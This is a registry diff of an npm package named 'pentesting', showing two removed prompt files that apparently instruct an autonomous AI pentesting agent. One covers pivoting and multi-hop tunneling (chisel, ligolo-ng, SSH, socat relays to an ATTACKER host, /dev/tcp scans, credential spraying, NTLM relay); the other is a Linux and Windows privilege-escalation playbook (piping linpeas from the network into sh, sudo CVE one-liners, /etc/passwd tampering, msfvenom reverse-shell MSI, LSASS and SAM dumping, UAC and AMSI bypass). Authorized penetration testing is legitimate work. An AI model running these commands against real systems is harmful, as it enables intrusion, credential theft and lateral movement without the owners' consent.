pentesting 0.73.13 → 0.90.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +120 -44
- package/bin/pentesting.mjs +32 -0
- package/lib/runtime.mjs +419 -0
- package/package.json +17 -46
- package/scripts/postinstall.mjs +30 -0
- package/scripts/preflight-local.sh +24 -0
- package/dist/ad/prompt.md +0 -60
- package/dist/agent-tool-KHXXTHGS.js +0 -989
- package/dist/api/prompt.md +0 -63
- package/dist/chunk-4UNNRHYY.js +0 -5797
- package/dist/chunk-GILD75OT.js +0 -11407
- package/dist/chunk-S5ZMXFHR.js +0 -1162
- package/dist/cloud/prompt.md +0 -49
- package/dist/container/prompt.md +0 -58
- package/dist/database/prompt.md +0 -58
- package/dist/email/prompt.md +0 -44
- package/dist/file-sharing/prompt.md +0 -56
- package/dist/ics/prompt.md +0 -76
- package/dist/main.d.ts +0 -1
- package/dist/main.js +0 -9777
- package/dist/network/prompt.md +0 -49
- package/dist/persistence-U2N3KWFH.js +0 -13
- package/dist/process-registry-4Y3HB4YQ.js +0 -30
- package/dist/prompts/base.md +0 -436
- package/dist/prompts/ctf-crypto.md +0 -168
- package/dist/prompts/ctf-forensics.md +0 -182
- package/dist/prompts/ctf-pwn.md +0 -137
- package/dist/prompts/evasion.md +0 -215
- package/dist/prompts/exploit.md +0 -416
- package/dist/prompts/infra.md +0 -114
- package/dist/prompts/llm/analyst-system.md +0 -76
- package/dist/prompts/llm/context-extractor-system.md +0 -19
- package/dist/prompts/llm/input-processor-system.md +0 -64
- package/dist/prompts/llm/memory-synth-system.md +0 -14
- package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
- package/dist/prompts/llm/reflector-system.md +0 -16
- package/dist/prompts/llm/report-generator-system.md +0 -21
- package/dist/prompts/llm/strategist-fallback.md +0 -9
- package/dist/prompts/llm/triage-system.md +0 -47
- package/dist/prompts/main-agent.md +0 -193
- package/dist/prompts/offensive-playbook.md +0 -250
- package/dist/prompts/payload-craft.md +0 -181
- package/dist/prompts/post.md +0 -185
- package/dist/prompts/recon.md +0 -296
- package/dist/prompts/report.md +0 -98
- package/dist/prompts/strategist-system.md +0 -472
- package/dist/prompts/strategy.md +0 -163
- package/dist/prompts/techniques/README.md +0 -40
- package/dist/prompts/techniques/ad-attack.md +0 -261
- package/dist/prompts/techniques/auth-access.md +0 -256
- package/dist/prompts/techniques/container-escape.md +0 -103
- package/dist/prompts/techniques/crypto.md +0 -296
- package/dist/prompts/techniques/enterprise-pentest.md +0 -175
- package/dist/prompts/techniques/file-attacks.md +0 -144
- package/dist/prompts/techniques/forensics.md +0 -313
- package/dist/prompts/techniques/injection.md +0 -217
- package/dist/prompts/techniques/lateral.md +0 -128
- package/dist/prompts/techniques/network-svc.md +0 -229
- package/dist/prompts/techniques/pivoting.md +0 -205
- package/dist/prompts/techniques/privesc.md +0 -190
- package/dist/prompts/techniques/pwn.md +0 -595
- package/dist/prompts/techniques/reversing.md +0 -183
- package/dist/prompts/techniques/sandbox-escape.md +0 -73
- package/dist/prompts/techniques/shells.md +0 -194
- package/dist/prompts/vuln.md +0 -190
- package/dist/prompts/web.md +0 -318
- package/dist/prompts/zero-day.md +0 -298
- package/dist/remote-access/prompt.md +0 -52
- package/dist/web/prompt.md +0 -59
- package/dist/wireless/prompt.md +0 -62
|
@@ -1,205 +0,0 @@
|
|
|
1
|
-
# Pivoting & Multi-Hop Tunneling — Autonomous Guide
|
|
2
|
-
|
|
3
|
-
> **Cross-ref**: lateral.md (movement), ad-attack.md (AD pivoting), network-svc.md (internal services)
|
|
4
|
-
|
|
5
|
-
## Core Principle
|
|
6
|
-
|
|
7
|
-
Pivoting = using a compromised host as a relay to reach previously unreachable network segments.
|
|
8
|
-
The agent on the **outer host** can only reach the **inner network** through a pivot chain.
|
|
9
|
-
|
|
10
|
-
---
|
|
11
|
-
|
|
12
|
-
## Pivot Decision Tree
|
|
13
|
-
|
|
14
|
-
```
|
|
15
|
-
GOT SHELL ON HOST? → Run immediately:
|
|
16
|
-
ip a / ifconfig → list interfaces (look for 2+ NICs = pivot candidate)
|
|
17
|
-
ip route / route -n → routing table (internal subnets)
|
|
18
|
-
arp -a → visible hosts (discovered via ARP)
|
|
19
|
-
cat /etc/hosts → hardcoded internal names
|
|
20
|
-
netstat -an → internal listening services
|
|
21
|
-
ss -tlnp → listening ports (Linux)
|
|
22
|
-
|
|
23
|
-
FOUND INTERNAL SUBNET (e.g. 10.10.100.0/24)?
|
|
24
|
-
→ Port scan via pivot: nmap through socks proxy or chisel
|
|
25
|
-
→ Identify services → exploit from outer agent via tunnel
|
|
26
|
-
|
|
27
|
-
FOUND INTERNAL HOST NAMES?
|
|
28
|
-
→ DNS resolution from pivot: dig @internal-DNS hostname
|
|
29
|
-
→ Look for: DC, DB, git, admin, intranet, mail
|
|
30
|
-
```
|
|
31
|
-
|
|
32
|
-
---
|
|
33
|
-
|
|
34
|
-
## Method 1: SSH Tunneling (if SSH available on pivot)
|
|
35
|
-
|
|
36
|
-
```
|
|
37
|
-
LOCAL PORT FORWARD — access pivot's localhost from attacker:
|
|
38
|
-
ssh -L 8080:127.0.0.1:80 user@PIVOT
|
|
39
|
-
→ Now: http://localhost:8080 = http://PIVOT:80
|
|
40
|
-
|
|
41
|
-
REMOTE PORT FORWARD — expose attacker port through pivot:
|
|
42
|
-
ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT
|
|
43
|
-
→ From PIVOT: nc attacker 4444 reaches attacker's local 4444
|
|
44
|
-
|
|
45
|
-
DYNAMIC SOCKS PROXY — route arbitrary traffic through pivot:
|
|
46
|
-
ssh -D 1080 user@PIVOT
|
|
47
|
-
→ proxychains / nmap --proxies socks4://127.0.0.1:1080 INTERNAL_TARGET
|
|
48
|
-
|
|
49
|
-
MULTI-HOP (3 hops):
|
|
50
|
-
ssh -J user@HOP1,user@HOP2 user@FINAL_TARGET
|
|
51
|
-
ssh -L 8080:INTERNAL:80 -J user@HOP1 user@HOP2
|
|
52
|
-
```
|
|
53
|
-
|
|
54
|
-
---
|
|
55
|
-
|
|
56
|
-
## Method 2: Chisel (No SSH Required — TCP over HTTP)
|
|
57
|
-
|
|
58
|
-
```
|
|
59
|
-
ATTACKER SIDE (server):
|
|
60
|
-
chisel server --port 8080 --reverse
|
|
61
|
-
|
|
62
|
-
PIVOT SIDE (client — upload chisel binary):
|
|
63
|
-
chisel client ATTACKER:8080 R:socks → SOCKS5 on attacker:1080
|
|
64
|
-
chisel client ATTACKER:8080 R:4444:10.10.100.5:22 → forward specific port
|
|
65
|
-
|
|
66
|
-
MULTI-HOP chisel:
|
|
67
|
-
HOP1 connects to attacker → SOCKS on attacker:1080
|
|
68
|
-
HOP2 connects to HOP1 via proxychains → SOCKS chain
|
|
69
|
-
|
|
70
|
-
USAGE with proxychains:
|
|
71
|
-
echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
|
|
72
|
-
proxychains nmap -sT -Pn -p 22,80,443,445,3389 10.10.100.0/24
|
|
73
|
-
proxychains evil-winrm -i 10.10.100.5 -u admin -p pass
|
|
74
|
-
```
|
|
75
|
-
|
|
76
|
-
---
|
|
77
|
-
|
|
78
|
-
## Method 3: Ligolo-ng (Kernel TUN — fastest, cleanest)
|
|
79
|
-
|
|
80
|
-
```
|
|
81
|
-
ATTACKER (proxy):
|
|
82
|
-
sudo ip tuntap add user $USER mode tun ligolo
|
|
83
|
-
sudo ip link set ligolo up
|
|
84
|
-
./proxy -selfcert
|
|
85
|
-
|
|
86
|
-
PIVOT (agent — upload binary):
|
|
87
|
-
./agent -connect ATTACKER:11601 -ignore-cert
|
|
88
|
-
|
|
89
|
-
ATTACKER — after agent connects:
|
|
90
|
-
session → select agent
|
|
91
|
-
listener_add --addr 0.0.0.0:1234 --to 10.10.100.5:22 → port forward
|
|
92
|
-
start → add route: sudo ip route add 10.10.100.0/24 dev ligolo
|
|
93
|
-
→ Now: ssh admin@10.10.100.5 directly (no proxychains!)
|
|
94
|
-
|
|
95
|
-
MULTI-HOP with ligolo:
|
|
96
|
-
Agent on HOP1 → reach HOP2 network
|
|
97
|
-
Upload agent to HOP2 → connect through ligolo listener on HOP1
|
|
98
|
-
web_search("ligolo-ng double pivot setup multi-hop")
|
|
99
|
-
```
|
|
100
|
-
|
|
101
|
-
---
|
|
102
|
-
|
|
103
|
-
## Method 4: Metasploit Route / SOCKS
|
|
104
|
-
|
|
105
|
-
```
|
|
106
|
-
meterpreter session on pivot:
|
|
107
|
-
background
|
|
108
|
-
use post/multi/manage/autoroute
|
|
109
|
-
set SESSION 1 → run
|
|
110
|
-
|
|
111
|
-
Then:
|
|
112
|
-
use auxiliary/server/socks_proxy → set VERSION 5 → run
|
|
113
|
-
→ proxychains through Metasploit SOCKS on 127.0.0.1:1080
|
|
114
|
-
|
|
115
|
-
portfwd in meterpreter:
|
|
116
|
-
portfwd add -l 3389 -p 3389 -r INTERNAL_HOST
|
|
117
|
-
→ rdesktop localhost:3389
|
|
118
|
-
```
|
|
119
|
-
|
|
120
|
-
---
|
|
121
|
-
|
|
122
|
-
## Method 5: Netcat / Socat Relay (No binary upload — abuse existing tools)
|
|
123
|
-
|
|
124
|
-
```
|
|
125
|
-
NETCAT RELAY (if mkfifo available):
|
|
126
|
-
mkfifo /tmp/pipe
|
|
127
|
-
nc -l -p 4444 < /tmp/pipe | nc INTERNAL_TARGET 22 > /tmp/pipe
|
|
128
|
-
|
|
129
|
-
SOCAT RELAY:
|
|
130
|
-
socat TCP-LISTEN:4444,fork TCP:INTERNAL_TARGET:22
|
|
131
|
-
→ Persistent relay: socat TCP-LISTEN:4444,fork,reuseaddr TCP:TARGET:22
|
|
132
|
-
|
|
133
|
-
SOCAT SOCKS PROXY (if socat version supports it):
|
|
134
|
-
socat TCP-LISTEN:1080,fork SOCKS4A:localhost:INTERNAL_HOST:PORT,socksport=1080
|
|
135
|
-
```
|
|
136
|
-
|
|
137
|
-
---
|
|
138
|
-
|
|
139
|
-
## Internal Network Scanning via Pivot
|
|
140
|
-
|
|
141
|
-
```
|
|
142
|
-
VIA PROXYCHAINS (any pivot method):
|
|
143
|
-
proxychains nmap -sT -Pn -p 22,80,443,445,1433,3306,3389,5985,6379,8080 INTERNAL/24
|
|
144
|
-
proxychains nmap -sT -Pn --top-ports 100 INTERNAL/24
|
|
145
|
-
|
|
146
|
-
BASH PING SWEEP (when no tools):
|
|
147
|
-
for i in $(seq 1 254); do ping -c1 -W1 10.10.100.$i &>/dev/null && echo "10.10.100.$i UP"; done
|
|
148
|
-
|
|
149
|
-
BASH PORT SCAN (when no tools):
|
|
150
|
-
for port in 22 80 443 445 3389 5985; do
|
|
151
|
-
(echo >/dev/tcp/10.10.100.5/$port) 2>/dev/null && echo "$port OPEN"
|
|
152
|
-
done
|
|
153
|
-
```
|
|
154
|
-
|
|
155
|
-
---
|
|
156
|
-
|
|
157
|
-
## Reverse Shell Through Pivot
|
|
158
|
-
|
|
159
|
-
```
|
|
160
|
-
DOUBLE PIVOT — get shell from deep internal host back to outside:
|
|
161
|
-
|
|
162
|
-
Method A: Chisel reverse
|
|
163
|
-
Outer SOCKS → proxychains + outer listener
|
|
164
|
-
Inner host connects outbound (if egress allowed):
|
|
165
|
-
chisel client ATTACKER:8080 R:4445:127.0.0.1:4445
|
|
166
|
-
|
|
167
|
-
Method B: Meterpreter bind shell
|
|
168
|
-
proxychains exploit/multi/handler (PAYLOAD: bind_tcp on INTERNAL_HOST)
|
|
169
|
-
lhost=INTERNAL_HOST → proxychains connect inbound
|
|
170
|
-
|
|
171
|
-
Method C: SSH -R through existing session
|
|
172
|
-
From inner host: ssh -R 9001:127.0.0.1:9001 pivot_user@PIVOT
|
|
173
|
-
From attacker: nc PIVOT:9001
|
|
174
|
-
|
|
175
|
-
Reverse shell via proxy (if internal host has egress):
|
|
176
|
-
→ Set attacker IP as destination (should reach PIVOT, then routed back)
|
|
177
|
-
→ Verify connectivity: proxychains curl http://ATTACKER:8080/test
|
|
178
|
-
```
|
|
179
|
-
|
|
180
|
-
---
|
|
181
|
-
|
|
182
|
-
## Credential Spray Across Pivoted Networks
|
|
183
|
-
|
|
184
|
-
```
|
|
185
|
-
Once you have credentials from the outer network → always spray internally:
|
|
186
|
-
proxychains crackmapexec smb 10.10.100.0/24 -u user -p pass --continue-on-success
|
|
187
|
-
proxychains crackmapexec winrm 10.10.100.0/24 -u user -p pass
|
|
188
|
-
proxychains impacket-psexec DOMAIN/user:pass@INTERNAL_HOST
|
|
189
|
-
|
|
190
|
-
Credential relay internally:
|
|
191
|
-
proxychains impacket-ntlmrelayx -t INTERNAL_TARGET -smb2support
|
|
192
|
-
Coerce auth from pivot: PetitPotam, PrinterBug, MS-RPRN
|
|
193
|
-
```
|
|
194
|
-
|
|
195
|
-
---
|
|
196
|
-
|
|
197
|
-
## Search Patterns
|
|
198
|
-
|
|
199
|
-
```
|
|
200
|
-
web_search("chisel multi-hop pivot {year}")
|
|
201
|
-
web_search("ligolo-ng double pivot internal network")
|
|
202
|
-
web_search("proxychains nmap internal network scanning")
|
|
203
|
-
web_search("pivot {OS} tunneling no binary upload")
|
|
204
|
-
web_search("reverse shell through pivot NAT traversal")
|
|
205
|
-
```
|
|
@@ -1,190 +0,0 @@
|
|
|
1
|
-
# Privilege Escalation — Comprehensive Autonomous Guide
|
|
2
|
-
|
|
3
|
-
> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
|
|
4
|
-
> Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
|
|
5
|
-
> to decide what to test and in what order. Adapt dynamically — not to this list.
|
|
6
|
-
|
|
7
|
-
> **Cross-ref**: shells.md (shell access), post.md (post-exploitation), lateral.md (lateral movement)
|
|
8
|
-
|
|
9
|
-
## Core Principle
|
|
10
|
-
Initial access is usually low-privileged. Privesc is MANDATORY.
|
|
11
|
-
There are hundreds of privesc vectors — automated tools + manual checks + SEARCH.
|
|
12
|
-
|
|
13
|
-
## 🐧 Linux Privilege Escalation
|
|
14
|
-
|
|
15
|
-
### Automated Enumeration (RUN FIRST)
|
|
16
|
-
```
|
|
17
|
-
ALWAYS run automated enumeration:
|
|
18
|
-
├── LinPEAS: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
|
|
19
|
-
├── LinEnum: web_search("linenum github") → download and run
|
|
20
|
-
├── linux-exploit-suggester: web_search("linux exploit suggester github")
|
|
21
|
-
├── pspy: monitor processes without root (cron jobs, other users' commands)
|
|
22
|
-
└── If tools can't be transferred: run commands manually (see below)
|
|
23
|
-
```
|
|
24
|
-
|
|
25
|
-
### Manual Privesc Vector Map
|
|
26
|
-
```
|
|
27
|
-
LINUX PRIVESC CATEGORIES:
|
|
28
|
-
│
|
|
29
|
-
├── 1. Kernel Exploits
|
|
30
|
-
│ ├── uname -a → kernel version
|
|
31
|
-
│ ├── web_search("linux kernel {version} privilege escalation exploit")
|
|
32
|
-
│ ├── searchsploit linux kernel {version}
|
|
33
|
-
│ └── Dirty COW, Dirty Pipe, OverlayFS, etc.
|
|
34
|
-
│
|
|
35
|
-
├── 2. SUID/SGID Binaries
|
|
36
|
-
│ ├── find / -perm -4000 -type f 2>/dev/null (SUID)
|
|
37
|
-
│ ├── find / -perm -2000 -type f 2>/dev/null (SGID)
|
|
38
|
-
│ ├── For EACH found binary: check GTFOBins
|
|
39
|
-
│ │ web_search("{binary_name} gtfobins")
|
|
40
|
-
│ ├── Custom SUID binaries: strings, ltrace, strace → find vulnerability
|
|
41
|
-
│ └── Known exploitable SUID: nmap, vim, python, find, bash, cp, mv, etc.
|
|
42
|
-
│
|
|
43
|
-
├── 3. Sudo Misconfiguration
|
|
44
|
-
│ ├── sudo -l (list what current user can sudo)
|
|
45
|
-
│ ├── (ALL, !root) → CVE-2019-14287: sudo -u#-1 /bin/bash
|
|
46
|
-
│ ├── NOPASSWD entries → check GTFOBins for each allowed command
|
|
47
|
-
│ ├── sudo version: sudo --version → web_search("sudo {version} CVE")
|
|
48
|
-
│ ├── LD_PRELOAD/LD_LIBRARY_PATH in env_keep → shared library injection
|
|
49
|
-
│ └── web_search("sudo {command} privilege escalation gtfobins")
|
|
50
|
-
│
|
|
51
|
-
├── 4. Cron Jobs
|
|
52
|
-
│ ├── cat /etc/crontab, ls -la /etc/cron.*, crontab -l
|
|
53
|
-
│ ├── Writable cron scripts → replace with reverse shell
|
|
54
|
-
│ ├── Wildcard injection: if cron uses * → inject flag files
|
|
55
|
-
│ │ tar: --checkpoint + --checkpoint-action=exec=sh
|
|
56
|
-
│ │ rsync: -e "sh shell.sh"
|
|
57
|
-
│ ├── PATH exploitation: cron PATH writable → place malicious binary first
|
|
58
|
-
│ └── pspy to discover hidden cron jobs and service activity
|
|
59
|
-
│
|
|
60
|
-
├── 5. Capabilities
|
|
61
|
-
│ ├── getcap -r / 2>/dev/null
|
|
62
|
-
│ ├── Exploitable: cap_setuid, cap_dac_override, cap_sys_admin, cap_net_raw
|
|
63
|
-
│ ├── Python with cap_setuid: python -c 'import os; os.setuid(0); os.system("/bin/bash")'
|
|
64
|
-
│ └── web_search("{binary} {capability} privilege escalation")
|
|
65
|
-
│
|
|
66
|
-
├── 6. Writable Files/Directories
|
|
67
|
-
│ ├── /etc/passwd writable → add root user (openssl passwd -1 -salt xyz password)
|
|
68
|
-
│ ├── /etc/shadow readable → crack hashes (hashcat/john)
|
|
69
|
-
│ ├── .bashrc/.profile of other users → inject commands
|
|
70
|
-
│ ├── Service config files → modify service to run as root
|
|
71
|
-
│ ├── init scripts/systemd services writable → modify ExecStart
|
|
72
|
-
│ └── find / -writable -type f 2>/dev/null | grep -v proc
|
|
73
|
-
│
|
|
74
|
-
├── 7. Path Hijacking
|
|
75
|
-
│ ├── echo $PATH → are writable dirs BEFORE system dirs?
|
|
76
|
-
│ ├── Service/script calls command without absolute path → create in writable dir
|
|
77
|
-
│ ├── LD_LIBRARY_PATH → shared library hijacking
|
|
78
|
-
│ └── Python library path → create malicious module with same name
|
|
79
|
-
│
|
|
80
|
-
├── 8. NFS Misconfiguration
|
|
81
|
-
│ ├── cat /etc/exports → look for no_root_squash
|
|
82
|
-
│ ├── Mount from attacker → create SUID binary → execute on target
|
|
83
|
-
│ └── Web_search("NFS no_root_squash privilege escalation")
|
|
84
|
-
│
|
|
85
|
-
├── 9. Docker/Container Escape
|
|
86
|
-
│ ├── In docker group? → docker run -v /:/mnt --rm -it alpine chroot /mnt sh
|
|
87
|
-
│ ├── Privileged container? → mount /dev/sda1 /mnt → access host filesystem
|
|
88
|
-
│ ├── Docker socket mounted? → full host access
|
|
89
|
-
│ ├── cap_sys_admin → mount cgroup + notify_on_release → execute on host
|
|
90
|
-
│ └── web_search("docker container escape privilege escalation {year}")
|
|
91
|
-
│
|
|
92
|
-
├── 10. Sensitive Information
|
|
93
|
-
│ ├── grep -r "password" /var/www/ /opt/ /home/ /etc/ 2>/dev/null
|
|
94
|
-
│ ├── .env files, config files, database connection strings
|
|
95
|
-
│ ├── .bash_history, .mysql_history, .sh_history
|
|
96
|
-
│ ├── SSH keys: find / -name "id_rsa" -o -name "*.pem" 2>/dev/null
|
|
97
|
-
│ ├── Stored credentials: /var/www/html/wp-config.php, .git/config
|
|
98
|
-
│ └── Internal services with credentials → pivot to higher-priv user
|
|
99
|
-
│
|
|
100
|
-
└── 11. Miscellaneous
|
|
101
|
-
├── Shared library injection via writable .so files
|
|
102
|
-
├── AppArmor/SELinux misconfiguration → bypass
|
|
103
|
-
├── dbus exploitation
|
|
104
|
-
├── Polkit vulnerabilities (CVE-2021-4034 pkexec, CVE-2021-3560)
|
|
105
|
-
└── web_search("linux privilege escalation {year} new techniques")
|
|
106
|
-
```
|
|
107
|
-
|
|
108
|
-
## 🪟 Windows Privilege Escalation
|
|
109
|
-
|
|
110
|
-
### Automated Enumeration
|
|
111
|
-
```
|
|
112
|
-
├── WinPEAS: upload and run (or run from memory via PowerShell)
|
|
113
|
-
├── PowerUp.ps1: Invoke-AllChecks
|
|
114
|
-
├── Seatbelt.exe: comprehensive security enumeration
|
|
115
|
-
├── SharpUp.exe: check for common privesc vectors
|
|
116
|
-
└── windows-exploit-suggester: compare systeminfo output
|
|
117
|
-
```
|
|
118
|
-
|
|
119
|
-
### Manual Privesc Vector Map
|
|
120
|
-
```
|
|
121
|
-
WINDOWS PRIVESC CATEGORIES:
|
|
122
|
-
│
|
|
123
|
-
├── 1. Kernel Exploits
|
|
124
|
-
│ ├── systeminfo → OS version + patch level
|
|
125
|
-
│ ├── web_search("windows {version} {build} privilege escalation exploit")
|
|
126
|
-
│ ├── windows-exploit-suggester --update --systeminfo sysinfo.txt
|
|
127
|
-
│ └── Notable: PrintNightmare, HiveNightmare, EternalBlue, JuicyPotato, etc.
|
|
128
|
-
│
|
|
129
|
-
├── 2. Service Exploits
|
|
130
|
-
│ ├── Unquoted service paths: wmic service get name,pathname | findstr /i "C:"
|
|
131
|
-
│ ├── Weak service permissions: sc qc <service>, accesschk.exe
|
|
132
|
-
│ ├── Service binary replacement: replace binary of service running as SYSTEM
|
|
133
|
-
│ ├── DLL Hijacking: missing DLL → place malicious DLL in search path
|
|
134
|
-
│ └── Registry permissions: writable service registry keys
|
|
135
|
-
│
|
|
136
|
-
├── 3. Token Impersonation
|
|
137
|
-
│ ├── SeImpersonatePrivilege → JuicyPotato/PrintSpoofer/GodPotato
|
|
138
|
-
│ ├── SeAssignPrimaryTokenPrivilege → token manipulation
|
|
139
|
-
│ ├── whoami /priv → check all privileges
|
|
140
|
-
│ └── web_search("windows token impersonation SeImpersonate exploit {year}")
|
|
141
|
-
│
|
|
142
|
-
├── 4. AlwaysInstallElevated
|
|
143
|
-
│ ├── Check: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
|
144
|
-
│ ├── If enabled → create malicious .msi → runs as SYSTEM
|
|
145
|
-
│ └── msfvenom -p windows/shell_reverse_tcp ... -f msi > evil.msi
|
|
146
|
-
│
|
|
147
|
-
├── 5. Stored Credentials
|
|
148
|
-
│ ├── cmdkey /list → stored credentials
|
|
149
|
-
│ ├── runas /savecred /user:admin "cmd /c reverse_shell.exe"
|
|
150
|
-
│ ├── SAM/SYSTEM backup files → dump hashes
|
|
151
|
-
│ ├── LSASS dump: mimikatz, Task Manager, procdump
|
|
152
|
-
│ ├── Registry: reg save HKLM\SAM sam, reg save HKLM\SYSTEM system
|
|
153
|
-
│ ├── Credential Manager, DPAPI protected blobs
|
|
154
|
-
│ └── web_search("windows credential extraction techniques {year}")
|
|
155
|
-
│
|
|
156
|
-
├── 6. Scheduled Tasks
|
|
157
|
-
│ ├── schtasks /query /fo LIST /v
|
|
158
|
-
│ ├── Writable task scripts → replace with malicious code
|
|
159
|
-
│ ├── Writable task binary paths → replace binary
|
|
160
|
-
│ └── Missing binaries → create malicious binary at expected path
|
|
161
|
-
│
|
|
162
|
-
├── 7. Registry Exploits
|
|
163
|
-
│ ├── AutoRun: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
|
|
164
|
-
│ ├── Writable registry keys → modify
|
|
165
|
-
│ └── AppInit_DLLs, Image File Execution Options
|
|
166
|
-
│
|
|
167
|
-
├── 8. UAC Bypass
|
|
168
|
-
│ ├── web_search("UAC bypass technique {year}")
|
|
169
|
-
│ ├── fodhelper.exe bypass, eventvwr.exe bypass
|
|
170
|
-
│ ├── DLL side-loading in auto-elevated processes
|
|
171
|
-
│ └── UACME github → comprehensive UAC bypass collection
|
|
172
|
-
│
|
|
173
|
-
└── 9. Miscellaneous
|
|
174
|
-
├── AMSI bypass → web_search("AMSI bypass {year}")
|
|
175
|
-
├── AppLocker bypass → web_search("AppLocker bypass {year}")
|
|
176
|
-
├── Network credential sniffing (Responder, Inveigh)
|
|
177
|
-
├── Clipboard monitoring for passwords
|
|
178
|
-
└── web_search("windows privilege escalation {year} new techniques")
|
|
179
|
-
```
|
|
180
|
-
|
|
181
|
-
## Universal Privesc Search Pattern
|
|
182
|
-
```
|
|
183
|
-
1. What OS/version? → web_search("{OS} {version} privilege escalation")
|
|
184
|
-
2. What services? → web_search("{service} privilege escalation")
|
|
185
|
-
3. What binaries? → web_search("{binary} gtfobins") OR web_search("{binary} lolbas")
|
|
186
|
-
4. What's misconfigured? → interpret LinPEAS/WinPEAS output
|
|
187
|
-
5. What's writable? → modify writable files/services for shell execution
|
|
188
|
-
6. What credentials? → crack, spray, or reuse found credentials
|
|
189
|
-
7. Still stuck? → web_search("{kernel_version} exploit CVE PoC")
|
|
190
|
-
```
|